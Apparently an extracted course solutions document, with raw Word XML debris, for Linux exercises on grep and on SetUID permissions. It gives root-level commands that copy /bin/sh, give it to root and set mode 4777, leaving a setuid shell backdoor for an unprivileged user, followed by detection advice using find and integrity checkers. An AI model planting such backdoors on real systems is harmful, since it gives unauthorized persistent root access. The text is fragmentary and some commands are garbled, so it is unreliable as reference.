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03 - Solutions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03 - Solutions (Activities 04 and 06)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Solution Exercise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contain text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"lib" list.txt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how many lines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mp3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mp3 list.txt | wc -l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files inside “/etc/ directory that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” string inside.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-r host /etc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letter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-vi *a* list.txt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 and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” (lowercase).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-vi *a* list.txt | grep I *m*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g8aydkeqz63" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Solution Exercise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Using bit SetUid and supposing that temporally (something like 1 hour) you have access to a machine as root and in that machine you have permanently access to a user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alumno</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">” without sudoer permissions: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Question 01</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: How can we use bit SetUid bit to create a backdoor? (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Clue</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: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/bin/sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">” could be useful).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AS “root” use the following commands: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 $HOME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cp /bin/sh ./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chown root ./sh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4777 ./sh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Now we have created the backdoor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AS myuser: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Simply run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./sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">” in your home directory, and you will be root (you can check it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” command).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Question 02</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: How can we detect that kind of backdoors on our system? What kind of measures can we take to be safe against this kind of attack?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27">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="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find / -path /proc -prune -o -type f -perm +4000 -ls &gt; listado.txt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We can obtain all the files with bit SetUID bit active. If the list changes, maybe a new SetUID file     has been created. Also, we can use software for “system integrity” like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http://www.ossec.net/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ossec.net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